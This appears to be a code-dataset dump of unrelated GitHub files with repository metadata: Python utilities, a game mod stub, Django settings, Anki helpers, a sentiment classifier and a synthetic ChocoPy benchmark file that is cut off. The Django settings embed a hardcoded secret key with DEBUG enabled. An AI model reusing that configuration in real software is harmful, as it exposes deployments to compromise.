:return: an integer list of the distribution that sum to the size
"""
if not isinstance(relative_freq, list) or not all(isinstance(x, (int, float)) for x in relative_freq):
raise ValueError("The weighted pattern must be an list of numbers")
seed = seed if isinstance(seed, int) else int(time.time() * np.random.random())
if sum(relative_freq) != 1:
relative_freq = np.round(relative_freq / np.sum(relative_freq), 5)
generator = np.random.default_rng(seed=seed)
result = list(generator.binomial(n=size, p=relative_freq, size=len(relative_freq)))
diff = size - sum(result)
adjust = [0] * len(relative_freq)
if diff != 0:
unit = diff / sum(relative_freq)
for idx in range(len(relative_freq)):
adjust[idx] = int(round(relative_freq[idx] * unit, 0))
result = [a + b for (a, b) in zip(result, adjust)]
# There is a possibility the required size is not fulfilled, therefore add or remove elements based on freq
def _freq_choice(p: list):
"""returns a single index of the choice of the relative frequency"""
rnd = generator.random() * sum(p)
for i, w in enumerate(p):
rnd -= w
if rnd < 0:
return i
while sum(result) != size:
if sum(result) < size:
result[_freq_choice(relative_freq)] += 1
else:
weight_idx = _freq_choice(relative_freq)
if result[weight_idx] > 0:
result[weight_idx] -= 1
# ensure we have all positive values
return [0 if x < 0 else x for x in result]
@staticmethod
def _seed(seed: int=None, increment: bool=False):
if not isinstance(seed, int):
return int(time.time() * np.random.default_rng().random())
if increment:
seed += 1
if seed > 2 ** 31:
seed = int(time.time() * np.random.default_rng(seed=seed-1).random())
return seed
|
[
"darryl@aistac.net"
] |
darryl@aistac.net
|
faec0609802a89c78e7a68440c366cb65f7aae9e
|
dfd312b460385d72721389ee337ef4ca63af9106
|
/Craftgame/example_mod.py
|
99790525c9a94e41eb10f73ca4b9f0e5c9212584
|
[] |
no_license
|
Alex2772/Craftgame
|
1e7b04242f274099668fb5aa99976d67c0c415d2
|
7c13a585da4ee00242113f851ad3d38a9e26c3b5
|
refs/heads/unstable
| 2021-10-24T17:36:36.163729
| 2021-09-26T14:05:01
| 2021-09-26T14:05:01
| 138,429,074
| 13
| 6
| null | 2019-11-26T21:24:19
| 2018-06-23T19:46:45
|
C++
|
UTF-8
|
Python
| false
| false
| 259
|
py
|
import cge
import logger
@cge.CGEMod("My mod", "mm", "1.0.0")
class MyMod:
def __init__(self):
#cge.registerEventHandler(self, self.render_screen, "craftgame:render_screen_bg/pre")
cge.connectToServer("alex2772.ru", 24565)
def init():
mod = MyMod()
|
[
"alex2772sc@gmail.com"
] |
alex2772sc@gmail.com
|
270da1094f20a8b3a2a9eb8995a7b33d8f52109a
|
c7851c362e66d23690783844828a5f82f3626d11
|
/solution/web/add_sign.py
|
09009d03ba437f6a3068e08426a070eeef3c6e8d
|
[] |
no_license
|
obydenkova/Aviahackathon2021
|
194aff7b545e0b3882a96a55e0204ae3f844a542
|
b6972a1aca842a707f61d53c1d4f40f68fb0335f
|
refs/heads/main
| 2023-04-22T16:18:21.854554
| 2021-05-04T21:47:07
| 2021-05-04T21:47:07
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 811
|
py
|
from docxtpl import DocxTemplate, InlineImage
import logging
def sign_doc(name):
name_of_doc = "../docx_template/consent_personal_data_" + name + ".docx"
doc = DocxTemplate(name_of_doc)
logging.info(name_of_doc + " opened")
sign_img = InlineImage(doc, 'signature_resized.png')
context = {'place_to_sign': sign_img}
doc.render(context)
name_to_save = "consent_personal_data_" + name + "_signed" + ".docx"
doc.save(name_to_save)
logging.info(name_to_save + " signed and saved successfully")
if __name__ == "__main__":
name = "Вася Пупкин"
logging.basicConfig(filename='app.log', filemode='a', format='%(asctime)s - %(message)s', level=logging.INFO)
logging.info('Send request to SIGN doc file for ' + name)
sign_doc(name)
|
[
"noreply@github.com"
] |
obydenkova.noreply@github.com
|
23203158c06d57c816948414563a0d3b5f88c812
|
9633d418f303db848a8aac382ecb74fd0d9361d4
|
/foreigncurrency/settings.py
|
5b90311fe343a7f072a7a6fd045cbedd8a36a648
|
[] |
no_license
|
carolinasitorus/foreign-currency
|
0638d286268912cdf9843fd25138752c396a6331
|
6259bb8eafb2966920adbf29949673484ca2bcb7
|
refs/heads/master
| 2020-03-24T04:37:10.936250
| 2018-07-31T19:02:01
| 2018-07-31T19:02:01
| 142,459,228
| 0
| 1
| null | 2018-07-31T18:59:51
| 2018-07-26T15:23:11
|
Python
|
UTF-8
|
Python
| false
| false
| 4,051
|
py
|
"""
Django settings for foreigncurrency project.
Generated by 'django-admin startproject' using Django 2.0.7.
For more information on this file, see
https://docs.djangoproject.com/en/2.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.0/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.0/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'vpri2)72sbh4z1+bm*#l10=g8%8-f#fk7+5n!q&!n+v@c@wx!d'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'Currency',
'CurrencyExchangeRate',
'CurrencyPair',
'rest_framework'
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'foreigncurrency.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'foreigncurrency.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.0/ref/settings/#databases
# DATABASES = {
# 'default': {
# 'ENGINE': 'django.db.backends.sqlite3',
# 'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
# }
# }
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql_psycopg2',
'NAME': 'postgres',
'USER': 'postgres',
'HOST': 'db',
'PORT': 5432,
}
}
# Password validation
# https://docs.djangoproject.com/en/2.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.0/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = False
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.0/howto/static-files/
STATIC_URL = '/static/'
# REST_FRAMEWORK = {
# # Use Django's standard `django.contrib.auth` permissions,
# # or allow read-only access for unauthenticated users.
# 'DEFAULT_PERMISSION_CLASSES': [
# 'rest_framework.permissions.DjangoModelPermissionsOrAnonReadOnly'
# ]
# }
REST_FRAMEWORK = {
'DEFAULT_PAGINATION_CLASS': 'rest_framework.pagination.PageNumberPagination',
'PAGE_SIZE': 10,
'PAGINATE_BY_PARAM': 'page_size',
'TEST_REQUEST_RENDERER_CLASSES': (
'rest_framework.renderers.MultiPartRenderer',
'rest_framework.renderers.JSONRenderer',
'rest_framework.renderers.TemplateHTMLRenderer'
)
}
|
[
"if413061@gmail.com"
] |
if413061@gmail.com
|
9c2a49341bff6195b8066667d535d7894be629e7
|
e5b9aa2aeca511d36ea5c87b9fbbb8929b7d8f5b
|
/anki.py
|
20c0f250ca2aa6b3f7232cb140a05204394b2d56
|
[] |
no_license
|
ShinobuCR/anki-google-docs
|
763f91f12f7ce8f0f986256b6eaf6ce999172d29
|
40414e8d41cba0f4aa25d2edc3edb56dda9aa97e
|
refs/heads/master
| 2023-05-13T11:08:39.381755
| 2021-06-06T10:22:45
| 2021-06-06T10:22:45
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,000
|
py
|
import json
import requests
def add_note(front, back):
payload = {
"action": "addNote",
"version": 6,
"params": {
"note": {
"deckName": "Programming",
"modelName": "Basic",
"fields": {
"Front": "front content",
"Back": "back content"
}
}
}
}
payload['params']['note']['fields']['Front'] = front
payload['params']['note']['fields']['Back'] = back
json.dumps(payload)
requests.post('http://localhost:8765', json.dumps(payload))
def update_note(note_id, front, back):
payload = {
"action": "updateNoteFields",
"version": 6,
"params": {
"note": {
"id": 1,
"fields": {
"Front": "front content",
"Back": "back content"
}
}
}
}
payload['params']['note']['id'] = note_id
payload['params']['note']['fields']['Front'] = front
payload['params']['note']['fields']['Back'] = back
json.dumps(payload)
requests.post('http://localhost:8765', json.dumps(payload))
def find_notes():
payload = {
"action": "findNotes",
"version": 6,
"params": {
"query": "deck:Programming"
}
}
json.dumps(payload)
response = requests.post('http://localhost:8765', json.dumps(payload))
return json.loads(response.content)['result']
def notes_info(note_id):
payload = {
"action": "notesInfo",
"version": 6,
"params": {
"notes": [note_id]
}
}
json.dumps(payload)
response = requests.post('http://localhost:8765', json.dumps(payload))
return json.loads(response.content)['result']
def html_link(url):
return f'<a href="{url}">LINK</a>'
def embed_url(url):
return f'<embed height="800px" src="{url}" type="text/html" width="100%">'
|
[
"astepaniuk@tektelic.com"
] |
astepaniuk@tektelic.com
|
9dce25a25268b0696720b1ddd3a82be31b3a3856
|
d25dd793bbcb9f852b619a7a99d815f3406eae30
|
/NLP_Project_Sentiment_Classifier.py
|
61bd773d748d5127e5c09f0e80eb87f605f6b086
|
[] |
no_license
|
Shakurova/MachineLearningAlgorithms
|
e84c185aa7a9ca123c8f40367a0c40565b84de58
|
b8bf80e37112a4ea5e8732caa1a98c5c4e12f9a0
|
refs/heads/master
| 2020-06-11T22:15:49.255419
| 2017-03-22T14:17:59
| 2017-03-22T14:17:59
| 75,618,522
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 10,403
|
py
|
# -*- coding: utf-8 -*-
import re
import pandas as pd
import numpy as np
from lxml import etree
import pymorphy2
from nltk.tokenize import TreebankWordTokenizer
from stop_words import get_stop_words
import gensim
import matplotlib.pyplot as plt
from sklearn.ensemble import ExtraTreesClassifier
from sklearn.linear_model import LogisticRegression
from sklearn.base import TransformerMixin
from sklearn.naive_bayes import MultinomialNB
from sklearn.ensemble import RandomForestClassifier
from sklearn.tree import DecisionTreeClassifier
from sklearn.metrics import classification_report, f1_score, accuracy_score, confusion_matrix
from sklearn.pipeline import Pipeline
from sklearn.model_selection import StratifiedKFold, cross_val_score, train_test_split
from sklearn import cross_validation
"""
- Обучение:
Вытащить из корпуса все positive / negative слова
Векторизовать каждое слово с помощью word2vec
Написать простой классификатор (вектор - класс)
- Тестирование:
На вход поступает слово
Вектурезуем его с помощью word2vec и делаем predict
Краткий анализ результатов:
лучшие модели:
- dt при ruscorpora и .sample(frac=1)[:150]
- rt при web и .sample(frac=1)[:150]
- etx при web и .sample(frac=1)[:300]
"""
# Обученная модель из RusVectores
m = 'web_0_300_20.bin' #'ruscorpora_1_300_10.bin' #
# Тексты для разметки
# collocations_array = ['отвратительный', 'быстро', 'очень плохое обслуживание', 'отличное меню']
collocations_array = ['отличный выбор', 'не советуем', 'очень советуем', 'очень дорого', 'выше всяких похвал', 'в общем прекрасно', 'нам все понравилось', 'в целом ничего', 'отвратительный', 'быстро', 'очень плохое обслуживание', 'отличное меню', 'хороший', 'вкусный', 'замечательный', 'приятный', 'красивый', 'отличный']
# Ввести правильные ответы
true = {'отличный выбор': 'positive',
'не советуем': 'negative',
'очень советуем': 'positive',
'очень дорого': 'negative',
'выше всяких похвал': 'positive',
'в общем прекрасно': 'positive',
'нам все понравилось': 'positive',
'в целом ничего': 'positive',
'отвратительный': 'negative',
'быстро': 'positive',
'очень плохое обслуживание': 'negative',
'отличное меню' : 'positive',
'хороший' : 'positive',
'вкусный' : 'positive',
'замечательный' : 'positive',
'приятный' : 'positive',
'красивый' : 'positive',
'отличный' : 'positive'}
morph = pymorphy2.MorphAnalyzer()
tokenizer = TreebankWordTokenizer()
RUS_LETTERS = u'абвгдеёжзийклмнопрстуфхцчшщъыьэюя'
# Для POS в cleanization
transit = {'ADJF': 'ADJ',
'ADJS': 'ADJ',
'ADVB': 'ADV',
'COMP': 'ADV',
'CONJ': 'CCONJ',
'GRND': 'VERB',
'INFN': 'VERB',
'INTJ': 'INTJ',
'LATN': 'X',
'NOUN': 'NOUN',
'NPRO': 'PRON',
'NUMB': 'NUM',
'NUMR': 'NUM',
'PNCT': 'PUNCT',
'PRCL': 'PART',
'PRED': 'ADV',
'PREP': 'ADP',
'PRTF': 'ADJ',
'PRTS': 'VERB',
'ROMN': 'X',
'SYMB': 'SYM',
'UNKN': 'X',
'VERB': 'VERB'}
robj = re.compile('|'.join(transit.keys()))
def parse_xml(filename):
""" Парсинг входного корпуса"""
with open(filename, encoding='utf-8') as f:
xml = f.read()
dict = {}
text = []
category = []
sentiment = []
term = []
root = etree.fromstring(xml)
for child in root:
for aspect in child[3]:
if aspect.attrib['type'] == 'implicit' and aspect.attrib['sentiment']!= 'both' and aspect.attrib['sentiment']!= 'neutral':
text.append(child[2].text)
category.append(aspect.attrib['category'])
sentiment.append(aspect.attrib['sentiment'])
term.append(aspect.attrib['term'])
dict['text'] = text
dict['category'] = category
dict['sentiment'] = sentiment
dict['term'] = term
return dict
def cleanization(text):
"""Функция приводит входной текст в формат лемматизированное слово_POS"""
for line in text:
# 1. Все буквы в нижний регистр
text_text = text.lower()
# 2. Удаление всех небукв
letters_only = ''
for _c in text_text:
if _c in RUS_LETTERS:
letters_only += _c
else:
letters_only += ' '
# 3. Заменяем множественные пробелы
while ' ' in letters_only:
letters_only = letters_only.replace(' ', ' ')
# 4. Токенизация
word_list = tokenizer.tokenize(letters_only)
# 5. Лемматизация
clean_word_list = [morph.parse(word)[0].normal_form for word in word_list] # лемматизация
# 6. * Удаление стоп-слов + добавление тегов - части речи
# meaningful_words = [word for word in clean_word_list if word not in get_stop_words('ru')] # стоп-слова
meaningful_words = [
str(word) + '_' + robj.sub(lambda m: transit[m.group(0)], str(morph.parse(word)[0].tag.POS)) for word in
clean_word_list]
return ' '.join(meaningful_words)
def mean(a):
return sum(a) / len(a)
def word2vec_mean(text):
"""Усредняет вектор слов."""
arr = []
clean_text = cleanization(text)
# для каждого слова в тексте выводим его вектор
for word in clean_text.split(' '):
# есть ли слово в модели? Может быть, и нет
if word in model:
arr.append(model[word])
if len(list(map(mean, zip(*arr)))) != 0:
return list(map(mean, zip(*arr)))
else:
return [0 for i in range(0, 300)]
class FunctionFeaturizer(TransformerMixin):
""" Для создания своего вектора я использовала усредненную векторизацию с помощью word2vec"""
def __init__(self):
pass
def fit(self, X, y=None):
return self
def transform(self, X):
fvs = []
# fvs = word2vec_mean(X) # если подавать по словам, а не датафрейм
for datum in X:
fv = word2vec_mean(datum)
fvs.append(fv)
return np.array(fvs)
if __name__ == '__main__':
text_train = parse_xml('SentiRuEval_rest_markup_train.xml')
text_test = parse_xml('SentiRuEval_rest_markup_test.xml')
# Создаем датафрейм из тестового и тренировочного корпуса
df1 = pd.DataFrame(text_train)
df2 = pd.DataFrame(text_test)
frames = [df1, df2]
df = pd.concat(frames)
# Делаем датасет сбалансированным
df = pd.concat([df[df['sentiment'] == 'positive'].sample(frac=1)[:150], df[df['sentiment'] == 'negative']]).sample(frac=1) # ЗАМЕНА
# Загружаем модель
model = gensim.models.KeyedVectors.load_word2vec_format(m, binary=True)
model.init_sims(replace=True)
# Делим корпус на тестовый и тернировочный
X_train, X_test, y_train, y_test = train_test_split(df['term'], df['sentiment'], test_size=0.1)
def do_smth_with_model(data_train, class_train, data_test, class_test, steps):
"""Функция получает на взох данные и параметры для pipeline и печатает
результаты работы обучающей модели на тестовой выборке + возвращает pipeline"""
print('\nModel train')
pipeline = Pipeline(steps=steps)
cv_results = cross_val_score(pipeline,
data_train,
class_train,
cv=10,
scoring='accuracy',
)
print(cv_results.mean(), cv_results.std())
pipeline.fit(data_train, class_train)
class_predicted = pipeline.predict(data_test)
print(class_predicted)
print(classification_report(class_test, class_predicted))
return pipeline, class_predicted
w2v_featurizer = FunctionFeaturizer() # создание своего векторизатора
# Word2Vec + LogisticRegression
print('\nCustom Transformer + LogisticRegression')
lr_pipeline, label_predicted = do_smth_with_model(X_train, y_train,
X_test, y_test,
steps=[('custom', w2v_featurizer),
('classifier', LogisticRegression())])
# Word2Vec + ExtraTreesClassifier
print('\nCustom Transformer + ExtraTreesClassifier')
etx_pipeline, label_predicted = do_smth_with_model(X_train, y_train,
X_test, y_test,
steps=[('custom', w2v_featurizer),
('classifier', ExtraTreesClassifier())])
# Word2Vec + RandomForestClassifier
print('\nCustom Transformer + RandomForestClassifier')
rf_pipeline, label_predicted = do_smth_with_model(X_train, y_train,
X_test, y_test,
steps=[('custom', w2v_featurizer),
('classifier', RandomForestClassifier())])
# Word2Vec + DecisionTreeClassifier
print('\nCustom Transformer + DecisionTreeClassifier')
dt_pipeline, label_predicted = do_smth_with_model(X_train, y_train,
X_test, y_test,
steps=[('custom', w2v_featurizer),
('classifier', DecisionTreeClassifier())])
# Проверка работы модели на наших тестовых коллокациях
def predictor(collocations_array, pipeline):
mistakes = 0
arr = []
df1 = pd.DataFrame({'text': collocations_array})
for i in df1.text:
arr.append(i)
с = 0
for i in pipeline.predict(df1.text):
print(arr[с], ':', i)
if true[arr[с]] != i:
mistakes += 1
с += 1
print(mistakes)
# ВВЕДИТЕ СЛОВА, КОТОРЫЕ ХОТИТЕ ПРОВЕРИТЬ
predictor(collocations_array, etx_pipeline)
print('_'*30)
predictor(collocations_array, lr_pipeline)
print('_'*30)
predictor(collocations_array, rf_pipeline)
print('_'*30)
predictor(collocations_array, dt_pipeline)
|
[
"noreply@github.com"
] |
Shakurova.noreply@github.com
|
5746c95db3d1ff247776069f75e98382299337bc
|
007642d8c984efcaf6c294385c308834ac89c796
|
/Project 12.py
|
7fc5c2f89f5feb9182eb3f8faee65189f47dbf93
|
[] |
no_license
|
aluonimosi/PracticePython
|
3fdc5792ba7d4c61a298b9a0cd025235cbb9036f
|
fbfbd1aeee4681800c7c2816e4b4f4777d994e65
|
refs/heads/master
| 2020-03-21T02:05:23.829701
| 2019-02-16T06:54:29
| 2019-02-16T06:54:29
| 137,978,965
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 327
|
py
|
# Exercise 12
# Write a program that takes a list of numbers
# and makes a new list of only the first and last elements of the given list.
a = [5, 10, 15,15,2,5, 20, 25]
b=[]
b.append(a[0])
b.append(a[-1])
print (b)
# Inside a function
def first_and_last(a):
return [a[0], a[-1]]
first_and_last(a)
|
[
"noreply@github.com"
] |
aluonimosi.noreply@github.com
|
1686425f660c555065ece78d6555dfa097dc6be1
|
1ffaa803ef08794a25cd0f74f738222bcd9f7e76
|
/Python_Prog/while_loop.py
|
c12c55a6d485063e6c7e2bf1cffaca783ed49510
|
[] |
no_license
|
vysagh00/Python-programs
|
75d188809eb1ae78eeb59f377ef24a06d13a9337
|
c1b2b64115ebd46e91133109eb90dea60bd3a5b0
|
refs/heads/main
| 2023-08-26T12:34:00.783796
| 2021-10-28T16:59:40
| 2021-10-28T16:59:40
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 69
|
py
|
sum=0
i=0
while i<=10:
sum += i**3
i += 1
print(sum)
|
[
"noreply@github.com"
] |
vysagh00.noreply@github.com
|
57e0b43bd157f5140c109b02d53b65caeebdb426
|
c9ddbdb5678ba6e1c5c7e64adf2802ca16df778c
|
/cases/synthetic/sieve-big-7747.py
|
21059574743466a564b66ececa453e5f67f1165b
|
[] |
no_license
|
Virtlink/ccbench-chocopy
|
c3f7f6af6349aff6503196f727ef89f210a1eac8
|
c7efae43bf32696ee2b2ee781bdfe4f7730dec3f
|
refs/heads/main
| 2023-04-07T15:07:12.464038
| 2022-02-03T15:42:39
| 2022-02-03T15:42:39
| 451,969,776
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 31,474
|
py
|
# A resizable list of integers
class Vector(object):
items: [int] = None
size: int = 0
def __init__(self:"Vector"):
self.items = [0]
# Returns current capacity
def capacity(self:"Vector") -> int:
return len(self.items)
# Increases capacity of vector by one element
def increase_capacity(self:"Vector") -> int:
self.items = self.items + [0]
return self.capacity()
# Appends one item to end of vector
def append(self:"Vector", item: int) -> object:
if self.size == self.capacity():
self.increase_capacity()
self.items[self.size] = item
self.size = self.size + 1
# Appends many items to end of vector
def append_all(self:"Vector", new_items: [int]) -> object:
item:int = 0
for item in new_items:
self.append(item)
# Removes an item from the middle of vector
def remove_at(self:"Vector", idx: int) -> object:
if idx < 0:
return
while idx < self.size - 1:
self.items[idx] = self.items[idx + 1]
idx = idx + 1
self.size = self.size - 1
# Retrieves an item at a given index
def get(self:"Vector", idx: int) -> int:
return self.items[idx]
# Retrieves the current size of the vector
def length(self:"Vector") -> int:
return self.size
# A resizable list of integers
class Vector2(object):
items: [int] = None
items2: [int] = None
size: int = 0
size2: int = 0
def __init__(self:"Vector2"):
self.items = [0]
# Returns current capacity
def capacity(self:"Vector2") -> int:
return len(self.items)
# Returns current capacity
def capacity2(self:"Vector2") -> int:
return len(self.items)
# Increases capacity of vector by one element
def increase_capacity(self:"Vector2") -> int:
self.items = self.items + [0]
return self.capacity()
# Increases capacity of vector by one element
def increase_capacity2(self:"Vector2") -> int:
self.items = self.items + [0]
return self.capacity()
# Appends one item to end of vector
def append(self:"Vector2", item: int) -> object:
if self.size == self.capacity():
self.increase_capacity()
self.items[self.size] = item
self.size = self.size + 1
# Appends one item to end of vector
def append2(self:"Vector2", item: int, item2: int) -> object:
if self.size == self.capacity():
self.increase_capacity()
self.items[self.size] = item
self.size = self.size + 1
# Appends many items to end of vector
def append_all(self:"Vector2", new_items: [int]) -> object:
item:int = 0
for item in new_items:
self.append(item)
# Appends many items to end of vector
def append_all2(self:"Vector2", new_items: [int], new_items2: [int]) -> object:
item:int = 0
item2:int = 0
for item in new_items:
self.append(item)
# Removes an item from the middle of vector
def remove_at(self:"Vector2", idx: int) -> object:
if idx < 0:
return
while idx < self.size - 1:
self.items[idx] = self.items[idx + 1]
idx = idx + 1
self.size = self.size - 1
# Removes an item from the middle of vector
def remove_at2(self:"Vector2", idx: int, idx2: int) -> object:
if idx < 0:
return
while idx < self.size - 1:
self.items[idx] = self.items[idx + 1]
idx = idx + 1
self.size = self.size - 1
# Retrieves an item at a given index
def get(self:"Vector2", idx: int) -> int:
return self.items[idx]
# Retrieves an item at a given index
def get2(self:"Vector2", idx: int, idx2: int) -> int:
return self.items[idx]
# Retrieves the current size of the vector
def length(self:"Vector2") -> int:
return self.size
# Retrieves the current size of the vector
def length2(self:"Vector2") -> int:
return self.size
# A resizable list of integers
class Vector3(object):
items: [int] = None
items2: [int] = None
items3: [int] = None
size: int = 0
size2: int = 0
size3: int = 0
def __init__(self:"Vector3"):
self.items = [0]
# Returns current capacity
def capacity(self:"Vector3") -> int:
return len(self.items)
# Returns current capacity
def capacity2(self:"Vector3") -> int:
return len(self.items)
# Returns current capacity
def capacity3(self:"Vector3") -> int:
return len(self.items)
# Increases capacity of vector by one element
def increase_capacity(self:"Vector3") -> int:
self.items = self.items + [0]
return self.capacity()
# Increases capacity of vector by one element
def increase_capacity2(self:"Vector3") -> int:
self.items = self.items + [0]
return self.capacity()
# Increases capacity of vector by one element
def increase_capacity3(self:"Vector3") -> int:
self.items = self.items + [0]
return self.capacity()
# Appends one item to end of vector
def append(self:"Vector3", item: int) -> object:
if self.size == self.capacity():
self.increase_capacity()
self.items[self.size] = item
self.size = self.size + 1
# Appends one item to end of vector
def append2(self:"Vector3", item: int, item2: int) -> object:
if self.size == self.capacity():
self.increase_capacity()
self.items[self.size] = item
self.size = self.size + 1
# Appends one item to end of vector
def append3(self:"Vector3", item: int, item2: int, item3: int) -> object:
if self.size == self.capacity():
self.increase_capacity()
self.items[self.size] = item
self.size = self.size + 1
# Appends many items to end of vector
def append_all(self:"Vector3", new_items: [int]) -> object:
item:int = 0
for item in new_items:
self.append(item)
# Appends many items to end of vector
def append_all2(self:"Vector3", new_items: [int], new_items2: [int]) -> object:
item:int = 0
item2:int = 0
for item in new_items:
self.append(item)
# Appends many items to end of vector
def append_all3(self:"Vector3", new_items: [int], new_items2: [int], new_items3: [int]) -> object:
item:int = 0
item2:int = 0
item3:int = 0
for item in new_items:
self.append(item)
# Removes an item from the middle of vector
def remove_at(self:"Vector3", idx: int) -> object:
if idx < 0:
return
while idx < self.size - 1:
self.items[idx] = self.items[idx + 1]
idx = idx + 1
self.size = self.size - 1
# Removes an item from the middle of vector
def remove_at2(self:"Vector3", idx: int, idx2: int) -> object:
if idx < 0:
return
while idx < self.size - 1:
self.items[idx] = self.items[idx + 1]
idx = idx + 1
self.size = self.size - 1
# Removes an item from the middle of vector
def remove_at3(self:"Vector3", idx: int, idx2: int, idx3: int) -> object:
if idx < 0:
return
while idx < self.size - 1:
self.items[idx] = self.items[idx + 1]
idx = idx + 1
self.size = self.size - 1
# Retrieves an item at a given index
def get(self:"Vector3", idx: int) -> int:
return self.items[idx]
# Retrieves an item at a given index
def get2(self:"Vector3", idx: int, idx2: int) -> int:
return self.items[idx]
# Retrieves an item at a given index
def get3(self:"Vector3", idx: int, idx2: int, idx3: int) -> int:
return self.items[idx]
# Retrieves the current size of the vector
def length(self:"Vector3") -> int:
return self.size
# Retrieves the current size of the vector
def length2(self:"Vector3") -> int:
return self.size
# Retrieves the current size of the vector
def length3(self:"Vector3") -> int:
return self.size
# A resizable list of integers
class Vector4(object):
items: [int] = None
items2: [int] = None
items3: [int] = None
items4: [int] = None
size: int = 0
size2: int = 0
size3: int = 0
size4: int = 0
def __init__(self:"Vector4"):
self.items = [0]
# Returns current capacity
def capacity(self:"Vector4") -> int:
return len(self.items)
# Returns current capacity
def capacity2(self:"Vector4") -> int:
return len(self.items)
# Returns current capacity
def capacity3(self:"Vector4") -> int:
return len(self.items)
# Returns current capacity
def capacity4(self:"Vector4") -> int:
return len(self.items)
# Increases capacity of vector by one element
def increase_capacity(self:"Vector4") -> int:
self.items = self.items + [0]
return self.capacity()
# Increases capacity of vector by one element
def increase_capacity2(self:"Vector4") -> int:
self.items = self.items + [0]
return self.capacity()
# Increases capacity of vector by one element
def increase_capacity3(self:"Vector4") -> int:
self.items = self.items + [0]
return self.capacity()
# Increases capacity of vector by one element
def increase_capacity4(self:"Vector4") -> int:
self.items = self.items + [0]
return self.capacity()
# Appends one item to end of vector
def append(self:"Vector4", item: int) -> object:
if self.size == self.capacity():
self.increase_capacity()
self.items[self.size] = item
self.size = self.size + 1
# Appends one item to end of vector
def append2(self:"Vector4", item: int, item2: int) -> object:
if self.size == self.capacity():
self.increase_capacity()
self.items[self.size] = item
self.size = self.size + 1
# Appends one item to end of vector
def append3(self:"Vector4", item: int, item2: int, item3: int) -> object:
if self.size == self.capacity():
self.increase_capacity()
self.items[self.size] = item
self.size = self.size + 1
# Appends one item to end of vector
def append4(self:"Vector4", item: int, item2: int, item3: int, item4: int) -> object:
if self.size == self.capacity():
self.increase_capacity()
self.items[self.size] = item
self.size = self.size + 1
# Appends many items to end of vector
def append_all(self:"Vector4", new_items: [int]) -> object:
item:int = 0
for item in new_items:
self.append(item)
# Appends many items to end of vector
def append_all2(self:"Vector4", new_items: [int], new_items2: [int]) -> object:
item:int = 0
item2:int = 0
for item in new_items:
self.append(item)
# Appends many items to end of vector
def append_all3(self:"Vector4", new_items: [int], new_items2: [int], new_items3: [int]) -> object:
item:int = 0
item2:int = 0
item3:int = 0
for item in new_items:
self.append(item)
# Appends many items to end of vector
def append_all4(self:"Vector4", new_items: [int], new_items2: [int], new_items3: [int], new_items4: [int]) -> object:
item:int = 0
item2:int = 0
item3:int = 0
item4:int = 0
for item in new_items:
self.append(item)
# Removes an item from the middle of vector
def remove_at(self:"Vector4", idx: int) -> object:
if idx < 0:
return
while idx < self.size - 1:
self.items[idx] = self.items[idx + 1]
idx = idx + 1
self.size = self.size - 1
# Removes an item from the middle of vector
def remove_at2(self:"Vector4", idx: int, idx2: int) -> object:
if idx < 0:
return
while idx < self.size - 1:
self.items[idx] = self.items[idx + 1]
idx = idx + 1
self.size = self.size - 1
# Removes an item from the middle of vector
def remove_at3(self:"Vector4", idx: int, idx2: int, idx3: int) -> object:
if idx < 0:
return
while idx < self.size - 1:
self.items[idx] = self.items[idx + 1]
idx = idx + 1
self.size = self.size - 1
# Removes an item from the middle of vector
def remove_at4(self:"Vector4", idx: int, idx2: int, idx3: int, idx4: int) -> object:
if idx < 0:
return
while idx < self.size - 1:
self.items[idx] = self.items[idx + 1]
idx = idx + 1
self.size = self.size - 1
# Retrieves an item at a given index
def get(self:"Vector4", idx: int) -> int:
return self.items[idx]
# Retrieves an item at a given index
def get2(self:"Vector4", idx: int, idx2: int) -> int:
return self.items[idx]
# Retrieves an item at a given index
def get3(self:"Vector4", idx: int, idx2: int, idx3: int) -> int:
return self.items[idx]
# Retrieves an item at a given index
def get4(self:"Vector4", idx: int, idx2: int, idx3: int, idx4: int) -> int:
return self.items[idx]
# Retrieves the current size of the vector
def length(self:"Vector4") -> int:
return self.size
# Retrieves the current size of the vector
